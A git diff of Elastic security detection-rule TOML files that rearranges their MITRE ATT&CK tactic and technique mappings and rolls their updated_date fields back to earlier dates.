"2024/05/30" integration = ["aws"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -123,21 +123,39 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/ml_azure_rare_event_failures.toml b/rules/integrations/azure/ml_azure_rare_event_failures.toml index 98a52ccc75f..9e1182f57d9 100644 --- a/rules/integrations/azure/ml_azure_rare_event_failures.toml +++ b/rules/integrations/azure/ml_azure_rare_event_failures.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/24" +updated_date = "2025/12/08" [rule] anomaly_threshold = 50 @@ -91,6 +91,11 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat.technique]] id = "T1526" name = "Cloud Service Discovery" @@ -101,34 +106,9 @@ id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" @@ -137,6 +117,14 @@ reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" @@ -145,7 +133,16 @@ reference = "https://attack.mitre.org/tactics/TA0008/" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules/integrations/azure/persistence_automation_account_created.toml b/rules/integrations/azure/persistence_automation_account_created.toml index ce9b522545d..222286c88de 100644 --- a/rules/integrations/azure/persistence_automation_account_created.toml +++ b/rules/integrations/azure/persistence_automation_account_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -73,18 +73,26 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml b/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml index fb3b3e9c302..ac83b601e4d 100644 --- a/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml +++ b/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -86,3 +86,21 @@ reference = "https://attack.mitre.org/techniques/T1098/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml b/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml index f9329ea135b..0bb148e3260 100644 --- a/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml +++ b/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/03/03" [rule] author = ["Elastic"] @@ -106,3 +106,21 @@ reference = "https://attack.mitre.org/techniques/T1098/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml b/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml index a433254e859..746ad89fe61 100644 --- a/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml +++ b/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -84,3 +84,21 @@ reference = "https://attack.mitre.org/techniques/T1098/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml index 6ba483860a8..e354d1a2bfa 100644 --- a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml +++ b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/02" integration = ["o365"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/03/02" [rule] author = ["Elastic", "Austin Songer"] @@ -87,18 +87,34 @@ event.dataset:o365.audit [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml index 5e724854e3d..3cee4601d83 100644 --- a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml +++ b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -80,13 +80,50 @@ event.dataset:okta.system and event.action:user.account.report_suspicious_activi [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/linux/persistence_at_job_creation.toml b/rules/linux/persistence_at_job_creation.toml index 40a96e3b011..c0e77855ab2 100644 --- a/rules/linux/persistence_at_job_creation.toml +++ b/rules/linux/persistence_at_job_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -133,3 +133,39 @@ reference = "https://attack.mitre.org/techniques/T1053/002/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.002" +name = "At" +reference = "https://attack.mitre.org/techniques/T1053/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.002" +name = "At" +reference = "https://attack.mitre.org/techniques/T1053/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_boot_file_copy.toml b/rules/linux/persistence_boot_file_copy.toml index 7b91eeff00b..291d6f8eaa7 100644 --- a/rules/linux/persistence_boot_file_copy.toml +++ b/rules/linux/persistence_boot_file_copy.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -162,3 +162,11 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_cron_job_creation.toml b/rules/linux/persistence_cron_job_creation.toml index 0ba8618d0a2..752d0925262 100644 --- a/rules/linux/persistence_cron_job_creation.toml +++ b/rules/linux/persistence_cron_job_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -230,3 +230,39 @@ reference = "https://attack.mitre.org/techniques/T1053/003/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_systemd_service_creation.toml b/rules/linux/persistence_systemd_service_creation.toml index 73b4395f184..bce2f849d8f 100644 --- a/rules/linux/persistence_systemd_service_creation.toml +++ b/rules/linux/persistence_systemd_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/12/23" [transform] [[transform.osquery]] @@ -249,3 +249,21 @@ reference = "https://attack.mitre.org/techniques/T1543/002/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml index d02f2f59c77..c41b0d62e61 100644 --- a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml +++ b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/01/15" [rule] anomaly_threshold = 75 @@ -122,18 +122,26 @@ Sudo is a command in Unix-like systems that allows permitted users to execute co - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.003" -name = "Sudo and Sudo Caching" -reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/defense_evasion_injection_msbuild.toml b/rules/windows/defense_evasion_injection_msbuild.toml index eb5db75d1d3..742f00543cf 100755 --- a/rules/windows/defense_evasion_injection_msbuild.toml +++ b/rules/windows/defense_evasion_injection_msbuild.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -76,7 +76,6 @@ process where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" @@ -86,13 +85,27 @@ reference = "https://attack.mitre.org/techniques/T1055/" id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml index 7a8e2499e75..f7808e814e3 100644 --- a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml +++ b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/24" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -97,36 +97,48 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.012" +name = "Image File Execution Options Injection" +reference = "https://attack.mitre.org/techniques/T1546/012/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/defense_evasion_parent_process_pid_spoofing.toml b/rules/windows/defense_evasion_parent_process_pid_spoofing.toml index dde5e4ad59f..49a6b6d135d 100644 --- a/rules/windows/defense_evasion_parent_process_pid_spoofing.toml +++ b/rules/windows/defense_evasion_parent_process_pid_spoofing.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -114,18 +114,36 @@ Parent Process PID Spoofing involves manipulating the parent process identifier [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" - [[rule.threat.technique.subtechnique]] id = "T1134.004" name = "Parent PID Spoofing" reference = "https://attack.mitre.org/techniques/T1134/004/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.004" +name = "Parent PID Spoofing" +reference = "https://attack.mitre.org/techniques/T1134/004/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/execution_via_hidden_shell_conhost.toml b/rules/windows/execution_via_hidden_shell_conhost.toml index 1561c064fc1..df930dae4f7 100644 --- a/rules/windows/execution_via_hidden_shell_conhost.toml +++ b/rules/windows/execution_via_hidden_shell_conhost.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -107,31 +107,38 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_appcertdlls_registry.toml b/rules/windows/persistence_appcertdlls_registry.toml index 93e9f0a64a1..7cad2254650 100644 --- a/rules/windows/persistence_appcertdlls_registry.toml +++ b/rules/windows/persistence_appcertdlls_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -86,18 +86,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.009" name = "AppCert DLLs" reference = "https://attack.mitre.org/techniques/T1546/009/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.009" +name = "AppCert DLLs" +reference = "https://attack.mitre.org/techniques/T1546/009/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml index 39b2b1b7f26..078d2f2153c 100644 --- a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml +++ b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/15" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/09/11" [transform] [[transform.osquery]] @@ -161,23 +161,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_group_modification_by_system.toml b/rules/windows/persistence_group_modification_by_system.toml index 63402971c61..ddc052d6393 100644 --- a/rules/windows/persistence_group_modification_by_system.toml +++ b/rules/windows/persistence_group_modification_by_system.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/04/23" [rule] author = ["Elastic"] @@ -79,18 +79,26 @@ not group.id : "S-1-5-21-*-513" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_msoffice_startup_registry.toml b/rules/windows/persistence_msoffice_startup_registry.toml index 4e5303d4933..6be85a0e79a 100644 --- a/rules/windows/persistence_msoffice_startup_registry.toml +++ b/rules/windows/persistence_msoffice_startup_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/22" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -88,23 +88,31 @@ registry where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" - [[rule.threat.technique.subtechnique]] id = "T1137.002" name = "Office Test" reference = "https://attack.mitre.org/techniques/T1137/002/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_powershell_profiles.toml b/rules/windows/persistence_powershell_profiles.toml index 5e8eaf366af..419fec79e13 100644 --- a/rules/windows/persistence_powershell_profiles.toml +++ b/rules/windows/persistence_powershell_profiles.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/08/26" [transform] [[transform.osquery]] @@ -141,18 +141,36 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.013" name = "PowerShell Profile" reference = "https://attack.mitre.org/techniques/T1546/013/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" 